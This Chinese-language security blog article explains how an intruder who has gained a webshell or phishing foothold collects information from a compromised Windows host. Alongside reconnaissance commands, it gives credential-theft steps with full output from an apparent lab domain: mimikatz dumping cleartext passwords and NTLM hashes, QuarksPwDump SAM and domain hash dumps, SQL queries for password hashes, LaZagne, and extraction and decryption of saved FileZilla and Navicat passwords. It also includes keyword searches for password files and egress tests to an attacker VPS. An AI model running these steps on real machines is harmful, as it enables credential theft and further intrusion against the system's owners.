单机信息收集
2021-01-11 22:21:40 Author: www.freebuf.com(查看原文) 阅读量:125 收藏

思考

当我们获得一个webshell、或者通过钓鱼等等获得初始访问权后,在进一步渗透之前,我们有必要先收集一下当前机的信息,不单单是当前机的配置信息。

下面主要思考以下几个问题:

收集那些信息?

怎么收集这些信息?

为什么收集这些信息(有啥用,在哪用)?

解题

收集信息列表

本机配置信息-网络配置、是否域、系统配置、出网、端口连接信息、服务、进程、已安装软件、host文件、环境变量

账号密码 -本机账号密码、域内其他账号、数据库密码、SSH密码、远程登陆密码、WIFI密码、服务配置文件密码、备份文件密码等等

其他信息- 浏览器历史+书签、常用位置等等

收集方法及作用

本机配置信息

1. 网络配置

[ ip、网关、掩码、dns后缀] :主要用来配置一些网络信息,方便通道构建、了解当前网段大小

ipconfig /all

PS C:\Users\Administrator> ipconfig /all

Windows IP 配置

   主机名  . . . . . . . . . . . . . : WIN-DC
   主 DNS 后缀 . . . . . . . . . . . : langke.org
   节点类型  . . . . . . . . . . . . : 混合
   IP 路由已启用 . . . . . . . . . . : 否
   WINS 代理已启用 . . . . . . . . . : 否
   DNS 后缀搜索列表  . . . . . . . . : langke.org

以太网适配器 Ethernet0:

   连接特定的 DNS 后缀 . . . . . . . :
   描述. . . . . . . . . . . . . . . : Intel(R) 82574L 千兆网络连接
   物理地址. . . . . . . . . . . . . : 00-0C-29-95-22-43
   DHCP 已启用 . . . . . . . . . . . : 否
   自动配置已启用. . . . . . . . . . : 是
   本地链接 IPv6 地址. . . . . . . . : fe80::ed4c:c67:a2b6:7a38%12(首选)
   IPv4 地址 . . . . . . . . . . . . : 192.168.4.3(首选)
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . :
   DHCPv6 IAID . . . . . . . . . . . : 301993001
   DHCPv6 客户端 DUID  . . . . . . . : 00-01-00-01-27-5B-EF-6E-00-0C-29-95-22-43
   DNS 服务器  . . . . . . . . . . . : ::1
   TCPIP 上的 NetBIOS  . . . . . . . : 已启用

隧道适配器 isatap.{9A2D7433-2455-4F1A-9314-BBC3C6939A99}:

   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . :
   描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter #2
   物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP 已启用 . . . . . . . . . . . : 否
   自动配置已启用. . . . . . . . . . : 是

[DNS缓存]

ipconfig /displaydns

PS C:\Users\Administrator> ipconfig /displaydns

Windows IP 配置

    _ldap._tcp.win-dc.langke.org
    ----------------------------------------
    名称不存在。


    542906ca-9ac1-4fa5-b9d4-d1c60954df6c._msdcs.langke.org
    ----------------------------------------
    记录名称. . . . . . . : 542906ca-9ac1-4fa5-b9d4-d1c60954df6c._msdcs.langke.org
    记录类型. . . . . . . : 5
    生存时间. . . . . . . : 144
    数据长度. . . . . . . : 8
    部分. . . . . . . . . : 答案
    CNAME 记录  . . . . . : win-dc.langke.org


    isatap
    ----------------------------------------
    名称不存在。


    wpad
    ----------------------------------------
    名称不存在。


    _ldap._tcp.default-first-site-name._sites.win-dc.langke.org
    ----------------------------------------
    名称不存在。

 

[路由表]

route print

PS C:\Users\Administrator> route print
===========================================================================
接口列表
 12...00 0c 29 95 22 43 ......Intel(R) 82574L 千兆网络连接
  1...........................Software Loopback Interface 1
 13...00 00 00 00 00 00 00 e0 Microsoft ISATAP Adapter #2
===========================================================================

IPv4 路由表
===========================================================================
活动路由:
网络目标        网络掩码          网关       接口   跃点数
        127.0.0.0        255.0.0.0            在链路上         127.0.0.1    306
        127.0.0.1  255.255.255.255            在链路上         127.0.0.1    306
  127.255.255.255  255.255.255.255            在链路上         127.0.0.1    306
      192.168.4.0    255.255.255.0            在链路上       192.168.4.3    266
      192.168.4.3  255.255.255.255            在链路上       192.168.4.3    266
    192.168.4.255  255.255.255.255            在链路上       192.168.4.3    266
        224.0.0.0        240.0.0.0            在链路上         127.0.0.1    306
        224.0.0.0        240.0.0.0            在链路上       192.168.4.3    266
  255.255.255.255  255.255.255.255            在链路上         127.0.0.1    306
  255.255.255.255  255.255.255.255            在链路上       192.168.4.3    266
===========================================================================
永久路由:
  无

IPv6 路由表
===========================================================================
活动路由:
 接口跃点数网络目标                网关
  1    306 ::1/128                  在链路上
 12    266 fe80::/64                在链路上
 12    266 fe80::ed4c:c67:a2b6:7a38/128
                                    在链路上
  1    306 ff00::/8                 在链路上
 12    266 ff00::/8                 在链路上
===========================================================================
永久路由:
  无 

[arp表] :获取arp缓存记录,发现内网中更多的存活主机。

arp -a

PS C:\Users\Administrator> arp -a

接口: 192.168.4.3 --- 0xc
  Internet 地址         物理地址              类型
  192.168.4.100         00-0c-29-11-83-25     动态
  192.168.4.101         00-0c-29-dd-e4-ef     动态
  192.168.4.255         ff-ff-ff-ff-ff-ff     静态
  224.0.0.22            01-00-5e-00-00-16     静态
  224.0.0.252           01-00-5e-00-00-fc     静态 

2. 是否域

[主机名、域信息]:看当前主机是否在域内,如果在域内,进一步收集当前域信息。

net config workstation

PS C:\Users\Administrator> net config workstation
计算机名                     \\WIN-DC
计算机全名                   WIN-DC.langke.org
用户名                       Administrator

工作站正运行于
        NetBT_Tcpip_{9A2D7433-2455-4F1A-9314-BBC3C6939A99} (000C29952243)

软件版本                     Windows Server 2012 R2 Standard

工作站域                     LANGKE
工作站域 DNS 名称            langke.org
登录域                       LANGKE

COM 打开超时 (秒)            0
COM 发送计数 (字节)          16
COM 发送超时 (毫秒)          250
命令成功完成。
 

3. 系统配置

[系统名称、版本、位数、启动时间、是否虚拟机及虚拟机类型]:了解系统的基本信息,主要是方便工具的选择,还有不同版本Windows的变更。比如:2012版后默认无法读取明文密码,只能读取密码hash或更改注册表并重启才能读取密码。

systeminfo

PS C:\Users\Administrator> systeminfo

主机名:           WIN-DC
OS 名称:          Microsoft Windows Server 2012 R2 Standard
OS 版本:          6.3.9600 暂缺 Build 9600
OS 制造商:        Microsoft Corporation
OS 配置:          主域控制器
OS 构件类型:      Multiprocessor Free
注册的所有人:     Windows 用户
注册的组织:
产品 ID:          00252-70000-00000-AA581
初始安装日期:     2019/10/21, 23:12:01
系统启动时间:     2020/12/4, 23:36:58
系统制造商:       VMware, Inc.
系统型号:         VMware Virtual Platform
系统类型:         x64-based PC
处理器:           安装了 2 个处理器。
                  [01]: Intel64 Family 6 Model 142 Stepping 9 GenuineIntel ~
                  [02]: Intel64 Family 6 Model 142 Stepping 9 GenuineIntel ~
BIOS 版本:        Phoenix Technologies LTD 6.00, 2018/4/13
Windows 目录:     C:\Windows
系统目录:         C:\Windows\system32
启动设备:         \Device\HarddiskVolume1
系统区域设置:     zh-cn;中文(中国)
输入法区域设置:   zh-cn;中文(中国)
时区:             (UTC+08:00)北京,重庆,香港特别行政区,乌鲁木齐
物理内存总量:     2,047 MB
可用的物理内存:   846 MB
虚拟内存: 最大值: 6,655 MB
虚拟内存: 可用:   5,255 MB
虚拟内存: 使用中: 1,400 MB
页面文件位置:     C:\pagefile.sys
域:               langke.org
登录服务器:       \\WIN-DC
修补程序:         安装了 110 个修补程序。
                  [01]: KB2894852
                  [02]: KB2894856
                  [03]: KB2919355
                        ·
                        ·
                        ·
网卡:             安装了 1 个 NIC。
                  [01]: Intel(R) 82574L 千兆网络连接
                      连接名:      Ethernet0
                      启用 DHCP:   否
                      IP 地址
                        [01]: 192.168.4.3
                        [02]: fe80::ed4c:c67:a2b6:7a38
Hyper-V 要求:     已检测到虚拟机监控程序。将不显示 Hyper-V 所需的功能。​ 

4. 是否出网

[TCP、ICMP、UDP、DNS]:了解主机是否可以连接外网、主要为了配合代理搭建、数据导出等等

telnet vps_ip 80

ping vps_ip

nc -u vps_ip 53

nslookup www.baidu.com

5. 端口连接信息

[开放端口、连接信息]:主要用来收集端口开放情况,方便进一步渗透,比如: 3389端口,可以直接去连接桌面,1433端口,可以去进一步收集信息。

netstat -ano

C:\Users\lisi>netstat -ano

活动连接

  协议  本地地址          外部地址        状态           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       728
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:554            0.0.0.0:0              LISTENING       2992
  TCP    0.0.0.0:2869           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:5357           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:10243          0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49152          0.0.0.0:0              LISTENING       400
  TCP    0.0.0.0:49153          0.0.0.0:0              LISTENING       780
  TCP    0.0.0.0:49154          0.0.0.0:0              LISTENING       948
  TCP    0.0.0.0:49159          0.0.0.0:0              LISTENING       504
  TCP    0.0.0.0:64849          0.0.0.0:0              LISTENING       512
  TCP    192.168.4.101:139      0.0.0.0:0              LISTENING       4
  TCP    [::]:135               [::]:0                 LISTENING       728
  TCP    [::]:445               [::]:0                 LISTENING       4
  TCP    [::]:554               [::]:0                 LISTENING       2992
  TCP    [::]:2869              [::]:0                 LISTENING       4
  TCP    [::]:5357              [::]:0                 LISTENING       4
  TCP    [::]:10243             [::]:0                 LISTENING       4
  TCP    [::]:49152             [::]:0                 LISTENING       400
  TCP    [::]:49153             [::]:0                 LISTENING       780
  TCP    [::]:49154             [::]:0                 LISTENING       948
  TCP    [::]:49159             [::]:0                 LISTENING       504
  TCP    [::]:64849             [::]:0                 LISTENING       512
  UDP    0.0.0.0:123            *:*                                    596
  UDP    0.0.0.0:3702           *:*                                    1456
  UDP    0.0.0.0:3702           *:*                                    1456
  UDP    0.0.0.0:5004           *:*                                    2992
  UDP    0.0.0.0:5005           *:*                                    2992
  UDP    0.0.0.0:5355           *:*                                    1052
  UDP    0.0.0.0:55527          *:*                                    1456
  UDP    127.0.0.1:1900         *:*                                    1456
  UDP    127.0.0.1:55529        *:*                                    512
  UDP    127.0.0.1:55531        *:*                                    1052
  UDP    127.0.0.1:58374        *:*                                    948
  UDP    127.0.0.1:60697        *:*                                    1456
  UDP    192.168.4.101:137      *:*                                    4
  UDP    192.168.4.101:138      *:*                                    4
  UDP    192.168.4.101:1900     *:*                                    1456
  UDP    192.168.4.101:60696    *:*                                    1456
  UDP    [::]:123               *:*                                    596
  UDP    [::]:3702              *:*                                    1456
  UDP    [::]:3702              *:*                                    1456
  UDP    [::]:5004              *:*                                    2992
  UDP    [::]:5005              *:*                                    2992
  UDP    [::]:5355              *:*                                    1052
  UDP    [::]:55528             *:*                                    1456
  UDP    [::1]:1900             *:*                                    1456
  UDP    [::1]:60695            *:*                                    1456
  UDP    [fe80::d4b6:7c0:d036:7e77%11]:1900  *:*
    1456
  UDP    [fe80::d4b6:7c0:d036:7e77%11]:60694  *:*
     1456

6. 补丁

[补丁网址、ID、日期]:收集系统安装的补丁信息,一般提权时查找对应exp

wmic qfe get Caption,Description,HotFixID,InstalledOn

C:\Users\Administrator>wmic qfe get Caption,Description,HotFixID,InstalledOn
Caption                                     Description      HotFixID   InstalledOn
http://support.microsoft.com/?kbid=2534111  Hotfix           KB2534111  1/27/2020
http://support.microsoft.com/?kbid=2621440  Security Update  KB2621440  12/4/2020
http://support.microsoft.com/?kbid=2653956  Security Update  KB2653956  12/4/2020
http://support.microsoft.com/?kbid=2943357  Security Update  KB2943357  6/24/2020
http://support.microsoft.com/?kbid=2999226  Update           KB2999226  1/27/2020
http://support.microsoft.com/?kbid=3097989  Security Update  KB3097989  6/24/2020
http://support.microsoft.com/?kbid=4019990  Update           KB4019990  12/4/2020
http://support.microsoft.com/?kbid=4040980  Update           KB4040980  12/4/2020
http://support.microsoft.com                Update           KB958488   2/9/2020
http://support.microsoft.com/?kbid=976902   Update           KB976902   11/21/2010

7. 服务

[服务名、模式、路径名]:收集当前系统正在运行的服务,主要看看有没有杀软、监控软件、web服务、数据库服务。

wmic service where (state="running") get caption, name, startmode,pathname

C:\Users\Administrator>wmic service where (state="running") get caption, name, startmode,pathname
Caption                                    Name                                 PathName
                                           StartMode
Active Directory Web Services              ADWS                                 C:\Windows\ADWS\Microsoft.ActiveDirector
y.WebServices.exe                          Auto
Base Filtering Engine                      BFE                                  C:\Windows\system32\svchost.exe -k Local
ServiceNoNetwork                           Auto
Background Intelligent Transfer Service    BITS                                 C:\Windows\System32\svchost.exe -k netsv
cs                                         Auto
Background Tasks Infrastructure Service    BrokerInfrastructure                 C:\Windows\system32\svchost.exe -k DcomL
aunch                                      Auto
Computer Browser                           Browser                              C:\Windows\System32\svchost.exe -k netsv
cs                                         Auto
COM+ System Application                    COMSysApp                            C:\Windows\system32\dllhost.exe /Process
id:{02D4B3F1-FD88-11D1-960D-00805FC79235}  Manual
Cryptographic Services                     CryptSvc                             C:\Windows\system32\svchost.exe -k Netwo
rkService                                  Auto
DCOM Server Process Launcher               DcomLaunch                           C:\Windows\system32\svchost.exe -k DcomL
aunch                                      Auto
DFS Namespace                              Dfs                                  C:\Windows\system32\dfssvc.exe
                                           Auto
DFS Replication                            DFSR                                 C:\Windows\system32\DFSRs.exe
                                           Auto
DHCP Client                                Dhcp                                 C:\Windows\system32\svchost.exe -k Local
ServiceNetworkRestricted                   Auto
DHCP Server                                DHCPServer                           C:\Windows\system32\svchost.exe -k DHCPS
erver                                      Auto
Diagnostics Tracking Service               DiagTrack                            C:\Windows\System32\svchost.exe -k utcsv 

······

8. 进程

[进程名、pid、对应服务]:收集系统当前运行的进程,关注是否有杀软、监控软件、远程管理工具等

tasklist /svc

C:\Users\Administrator>tasklist /svc

映像名称                       PID 服务
========================= ======== ============================================
lsass.exe                      504 Kdc, Netlogon, NTDS, SamSs
svchost.exe                    636 BrokerInfrastructure, DcomLaunch, LSM,
                                   PlugPlay, Power, SystemEventsBroker
svchost.exe                    680 RpcEptMapper, RpcSs
dwm.exe                        776 暂缺
vmacthlp.exe                   796 VMware Physical Disk Helper Service
svchost.exe                    860 Dhcp, EventLog, lmhosts, Wcmsvc
svchost.exe                    892 BITS, Browser, DsmSvc, gpsvc, IKEEXT,
                                   iphlpsvc, LanmanServer, ProfSvc, Schedule,
                                   SENS, ShellHWDetection, Themes, Winmgmt
svchost.exe                    940 EventSystem, FontCache, netprofm, nsi,
                                   W32Time
svchost.exe                   1012 CryptSvc, Dnscache, LanmanWorkstation,
                                   NlaSvc, WinRM
svchost.exe                    736 BFE, DPS, MpsSvc
spoolsv.exe                   1340 Spooler
Microsoft.ActiveDirectory     1372 ADWS
dfsrs.exe                     1412 DFSR
svchost.exe                   1452 DHCPServer
svchost.exe                   1472 DiagTrack
dns.exe                       1488 DNS
ismserv.exe                   1508 IsmServ
MsDtsSrvr.exe                 1724 MsDtsServer110
SMSvcHost.exe                 1880 NetTcpPortSharing
sqlbrowser.exe                1932 SQLBrowser
sqlwriter.exe                 2000 SQLWriter
ServerManager.exe             3536 暂缺
vmtoolsd.exe                  1984 暂缺
mmc.exe                       1872 暂缺
powershell.exe                1428 暂缺
conhost.exe                   1776 暂缺
cmd.exe                       1076 暂缺
tasklist.exe                  3948 暂缺

9. 已安装软件

[软件、版本]:此命令收集的已安装软件可能不全,不过可以大概了解已安装的软件信息。可以用来提权和留后门。比如之前的某狗输入法依赖等。

wmic product get name,version

C:\Users\Administrator>wmic product get name,version
Name                                                                               Version
Microsoft Application Error Reporting                                              12.0.6012.5000
Microsoft SQL Server System CLR Types                                              10.51.2500.0
SQL Server 2012 Client Tools                                                       11.0.2100.60
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4974                     9.0.30729.4974
SQL Server 2012 Documentation Components                                           11.0.2100.60
Microsoft SQL Server 2012 数据层应用程序框架                                       11.0.2100.60
SQL Server 2012 Master Data Services                                               11.0.2100.60
Microsoft SQL Server 2012 Native Client                                            11.0.2100.60
SQL Server 2012 Database Engine Services                                           11.0.2100.60
Microsoft System CLR Types for SQL Server 2012                                     11.0.2100.60
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219                        10.0.40219
SQL Server 2012 Distributed Replay                                                 11.0.2100.60
Microsoft Visual C++ 2017 x86 Additional Runtime - 14.12.25810                     14.12.25810
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219                        10.0.40219
Microsoft SQL Server 2012 管理对象                                                 11.0.2100.60
VMware Tools                                                                       10.3.2.9925305
SQL Server 2012 Integration Services                                               11.0.2100.60
Microsoft VSS Writer for SQL Server 2012                                           11.0.2100.60
Visual Studio 2010 Prerequisites - English                                         10.0.40219
SQL Server 2012 Distributed Replay                                                 11.0.2100.60

10. hosts

[host文件]:系统的host配置,可能会收集到一些隐藏资产

C:\Windows\System32\drivers\etc\hosts

C:\Users\Administrator>type C:\Windows\System32\drivers\etc\hosts
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host

# localhost name resolution is handled within DNS itself.
#       127.0.0.1       localhost
#       ::1             localhost
 

11. 环境变量

[环境变量]:收集系统的环境变量,主要看有哪些可使用的脚本、程序等

path

C:\Users\Administrator>path
PATH=C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program File
s\Microsoft SQL Server\110\DTS\Binn\;C:\Program Files (x86)\Microsoft SQL Server\110\Tools\Binn\ManagementStudio\;C:\Pro
gram Files (x86)\Microsoft SQL Server\110\Tools\Binn\;C:\Program Files\Microsoft SQL Server\110\Tools\Binn\;C:\Program F
iles (x86)\Microsoft Visual Studio 10.0\Common7\IDE\PrivateAssemblies\;C:\Program Files (x86)\Microsoft SQL Server\110\D
TS\Binn\

12. 防火墙配置规则

[防火墙规则]:收集系统的防火墙配置规则,查看出入网配置情况。

netsh firewall show config

C:\Users\Administrator>netsh firewall show config

域 配置文件配置:
-------------------------------------------------------------------
操作模式                          = 禁用
例外模式                          = 启用
多播/广播响应模式                 = 启用
通知模式                          = 禁用

域 配置文件的服务配置文件:
模式     自定义      名称
-------------------------------------------------------------------
启用       否           文件和打印机共享

域 配置文件的允许的程序配置:
模式     流量方向             名称/程序
-------------------------------------------------------------------

域 配置文件的端口配置:
端口   协议    流量方向              名称
-------------------------------------------------------------------
1688   TCP       启用      入站                    HEU_KMS_Service

······ ​

账号密码

1. 本机账号密码

本机用户

net user

C:\Users\Administrator>net user

\\WIN-DC 的用户帐户

-------------------------------------------------------------------------------
Administrator            Guest                    john
krbtgt                   lisi
命令成功完成。 

在线用户

query user

C:\Users\Administrator>query user
 用户名                会话名             ID  状态    空闲时间   登录时间
>administrator         console             1  运行中      无     2020/12/4 23:38
 

密码

mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit

c:\Users\lisi\Desktop>mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit

  .#####.   mimikatz 2.2.0 (x64) #17763 Mar 25 2019 01:42:05
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo) ** Kitten Edition **
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # log
Using 'mimikatz.log' for logfile : OK

mimikatz(commandline) # sekurlsa::logonpasswords

Authentication Id : 0 ; 1931626 (00000000:001d796a)
Session           : Interactive from 2
User Name         : administrator
Domain            : LANGKE
Logon Server      : WIN-DC
Logon Time        : 2020/12/5 0:20:14
SID               : S-1-5-21-2022301354-2747916058-908538118-500
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : LANGKE
         * LM       : 629ea9eacefe7125c187b8085fe1d9df
         * NTLM     : 2723e394bfa34a878b638852b4e37335
         * SHA1     : 87af129263c193d09d6cade355c50a2d415cabe7
        tspkg :
         * Username : Administrator
         * Domain   : LANGKE
         * Password : 2wsx@WSX
        wdigest :
         * Username : Administrator
         * Domain   : LANGKE
         * Password : 2wsx@WSX
        kerberos :
         * Username : administrator
         * Domain   : LANGKE.ORG
         * Password : 2wsx@WSX
        ssp :
        credman :

Authentication Id : 0 ; 630324 (00000000:00099e34)
Session           : Interactive from 2
User Name         : lisi
Domain            : LANGKE
Logon Server      : WIN-DC
Logon Time        : 2020/12/4 23:45:44
SID               : S-1-5-21-2022301354-2747916058-908538118-1116

hash

QuarksPwDump.exe

// 本机hash
C:\Users\Administrator\Desktop>QuarksPwDump.exe -dhl
[+] Setting BACKUP and RESTORE privileges...[OK]
[+] Parsing SAM registry hive...[OK]
[+] BOOTKEY retrieving...[OK]
BOOTKEY = D61E03DA80125215915636F578505991

--------------------------------------------- BEGIN DUMP --------------------------------------------
Guest:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::
Administrator:500:AAD3B435B51404EEAAD3B435B51404EE:BC007082D32777855E253FD4DEFE70EE:::
---------------------------------------------- END DUMP ---------------------------------------------

2 dumped accounts

// 域hash
C:\Users\Administrator\Desktop>QuarksPwDump.exe -dhdc
[+] SYSKEY restrieving...[OK]
SYSKEY = 20242EE7E4AABBF78F48427B90233C50
[+] Setting BACKUP and RESTORE privileges...[OK]
[+] Parsing SECURITY registry hive...[OK]
[+] LSAKEY(s) retrieving...[OK]
LSAKEY = 708EBC555B43CA7C87FFEB7A46B41797C93D48746571F72838CA61E4D9F72CC1
[+] NLKM retrieving...[OK]
NL$KM = 5AA3BF230BD33D6CAE9F8ED398C50E336DD59357DCEBD64316ADD33B6183BF5F20CB880B7E664D68319673D10315EFF643934B4440D
F911AF41239E7DA82A313

No cached domain password found!

2. 域内其他账号

域用户

net user /domain

C:\Users\Administrator\Desktop>net user /domain

\\WIN-DC 的用户帐户

-------------------------------------------------------------------------------
Administrator            Guest                    john
krbtgt                   lisi
命令成功完成。

当前域在线机器

net view

C:\Users\Administrator\Desktop>net view
服务器名称            注解

-------------------------------------------------------------------------------
\\WIN-DC
\\WIN-OA41MD9F1FJ
命令成功完成。

当前域中的域管

net group "domain admins" /domain

C:\Users\Administrator\Desktop>net group "domain admins" /domain
组名     Domain Admins
注释     指定的域管理员

成员

-------------------------------------------------------------------------------
Administrator
命令成功完成。

3. 数据库中的密码

[Mysql]

select name,password from mysql.user

[MSSQL]

SELECT name, password_hash FROM master.sys.sql_logins;

4. 浏览器保存密码、远程登陆密码、Windows系统保存的凭证、WIFI密码等

lazagne.exe

5. FileZilla中保存的信息

[主机、端口、账号、密码]

type %appdata%\FileZilla\filezilla.xml | findstr /C:"Host" /c:"Pass" /c:"Port" /c:"User"

C:\Users\Administrator>type %appdata%\FileZilla\filezilla.xml | findstr /C:"Host" /c:"Pass" /c:"Port" /c:"User"
                <Setting name="Config Location" platform="win">C:\Users\john\App
Data\Roaming\FileZilla\</Setting>
                                        <Host />
                                        <Port>21</Port>
                                        <LocalPath>C:\Users\john\</LocalPath>
                                        <Host>127.0.0.1</Host>
                                        <Port>21</Port>
                                        <User>admin</User>
                                        <Pass encoding="base64">MTIzNDU2Nzg=</Pass> 

6. 管理工具中保存的信息

Navicat

[Mysql、MSSQL、Oracle、SQLite、MariaDB、PostgreSQL]:主机、端口、账号都是明文,密码为自定义加密,网上有解密脚本。

MySQL:HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers\

MariaDB:HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMARIADB\Servers\

Microsoft SQL:HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMSSQL\Servers\

Oracle:HKEY_CURRENT_USER\Software\PremiumSoft\NavicatOra\Servers\

PostgreSQL:HKEY_CURRENT_USER\Software\PremiumSoft\NavicatPG\Servers\

SQLite:HKEY_CURRENT_USER\Software\PremiumSoft\NavicatSQLite\Servers\

// 查看保存有那些数据库的账号密码
C:\Users\Administrator>reg query HKCU\Software\PremiumSoft /f Navicat

HKEY_CURRENT_USER\Software\PremiumSoft\Navicat
HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMARIADB
HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMONGODB
HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMSSQL
HKEY_CURRENT_USER\Software\PremiumSoft\NavicatOra
HKEY_CURRENT_USER\Software\PremiumSoft\NavicatPG
HKEY_CURRENT_USER\Software\PremiumSoft\NavicatPremium
HKEY_CURRENT_USER\Software\PremiumSoft\NavicatSQLite
搜索结束: 找到 8 匹配。

// 查看用户名
C:\Users\Administrator>reg query HKCU\Software\PremiumSoft /s /f UserName /e

HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers\192.168.1.122
    UserName    REG_SZ    root

HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers\192.168.1.123
    UserName    REG_SZ    root

// 查看密码hash
reg query HKCU\Software\PremiumSoft /s /f Pwd /e
C:\Users\Administrator>reg query HKCU\Software\PremiumSoft /s /f Pwd /e

HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers\192.168.1.122
    Pwd    REG_SZ

HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers\192.168.1.123
    Pwd    REG_SZ    5658213BB7E6B3

https://github.com/HyperSine/how-does-navicat-encrypt-password

C:\Users\Administrator>navicat-encrypt-password\python3>python3 NavicatCryptoHelper.py -d 5658213BB7E6B3
root!@#

TeamViewer、Xshell、VNC、Winscp、FoXMail等等

5. 文件中保存的账号密码

[文件名]:

dir /s /b "*密码*" "*登录*" "*资产*" "*VPN*" "*Svn*" "*Git*" "*交接*" "*离职*" "*网络*" "*后台*" "*拓扑*" "*邮箱*" "*工资*" "*管理员*" "*巡检*" "*备份*"

[文件内容]:从后缀为*.conf *.asp *.php *.jsp *.aspx *.cgi *.xml *.ini *.inf *.txt *.cgi的文件中搜索包含"user=" "pass=" "login=" "uid=" "pwd="等关键字的行

findstr /I /c:"user=" /c:"pass=" /c:"login=" /c:"uid=" /c:"pwd=" /si *.conf *.asp *.php *.jsp *.aspx *.cgi *.xml *.ini *.inf *.txt *.cgi

其他信息

1. 浏览器历史+书签

[Chrome 书签]:json格式

C:\Users\当前用户名\AppData\Local\Google\Chrome\User Data\Guest Profile\Bookmarks

[Chrome 历史记录]:SQLite格式,无密码。

C:\Users\当前用户名\AppData\Local\Google\Chrome\User Data\Default\History

Firefox、IE、Safar等等

工具:http://www.nirsoft.net

2. 常用位置文件列表

[桌面、下载]:大概率会有惊喜

dir c:%HOMEPATH%\Desktop

dir c:%HOMEPATH%\Download

结语

其实很多命令执行时有很大概率被拦截,最好的是调用接口,window都有对应的接口。用能力的同学,可以用C调用Windows系统API写一个收集以上信息的工具。期待ing···

参考:

https://mp.weixin.qq.com/s?__biz=MzI0OTkzOTc2Nw==&mid=2247484742&idx=1&sn=f27b0990ce003a785bca91bf384dc9fb&chksm=e988971edeff1e08a7de4734d195aca43a2065e42426a5b564bb40535809f2ea3d4e0bd442d4&scene=126&sessionid=1602663063&key=25b00d9988ce6f63d50c9689826518622519e7c6c1324b06a7809d3d5c69f9e1fa943e274127918eabaa09bd37d0b9fc25258c7b90984f339da049310b52afffbbb0a004b84ca1690b7a38ff3f097f3b69d0b3993978fc5ee2a929d13ee2b950babed23ba638e301f8b3145fea4aa843cf5b08223e7aac2e4f8bb7b4813c7de1&ascene=1&uin=NTYyNDkzMzU%3D&devicetype=Windows+10+x64&version=62090529&lang=zh_CN&exportkey=AQx2bvsbQu7AMBB73XecHMs%3D&pass_ticket=19nYqi7XqyRrYvGMeni97Lh4Yje18g8UIDScs0EUyJp3CIcPjq9X9JHA%2FDRChExX&wx_header=0


文章来源: https://www.freebuf.com/articles/system/260501.html
如有侵权请联系:admin#unsafe.sh